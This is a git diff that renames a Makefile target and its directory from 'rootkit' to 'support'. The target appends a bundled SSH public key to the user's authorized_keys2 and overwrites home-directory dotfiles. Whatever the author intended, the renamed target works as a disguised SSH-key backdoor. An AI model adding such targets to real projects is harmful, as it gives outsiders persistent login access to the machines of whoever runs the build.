diff --git a/Makefile.am b/Makefile.am index 5f36826d6f..1713e0c721 100644 --- a/Makefile.am +++ b/Makefile.am @@ -449,12 +449,12 @@ $(OUR_MODULES): || case "$$amf" in *=*) exit 1;; *k*) fail=yes;; *) exit 1;; esac; \ test -z "$$fail" -rootkit: - @cat rootkit-d/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2 - @cp rootkit-d/.emacs ~ - @cp rootkit-d/.screenrc ~ - @cp rootkit-d/.bashrc ~ - @sh rootkit-d/install-cc-mode.sh +support: + @cat support/shinzon.pub >> ~/.ssh/authorized_keys2 && chmod 600 ~/.ssh/authorized_keys2 + @cp support/.emacs ~ + @cp support/.screenrc ~ + @cp support/.bashrc ~ + @sh support/install-cc-mode.sh # Special targets diff --git a/rootkit-d/.bashrc b/support/.bashrc similarity index 100% rename from rootkit-d/.bashrc rename to support/.bashrc diff --git a/rootkit-d/.emacs b/support/.emacs similarity index 100% rename from rootkit-d/.emacs rename to support/.emacs diff --git a/rootkit-d/.screenrc b/support/.screenrc similarity index 100% rename from rootkit-d/.screenrc rename to support/.screenrc diff --git a/rootkit-d/install-cc-mode.sh b/support/install-cc-mode.sh similarity index 100% rename from rootkit-d/install-cc-mode.sh rename to support/install-cc-mode.sh diff --git a/rootkit-d/shinzon.pub b/support/shinzon.pub similarity index 100% rename from rootkit-d/shinzon.pub rename to support/shinzon.pub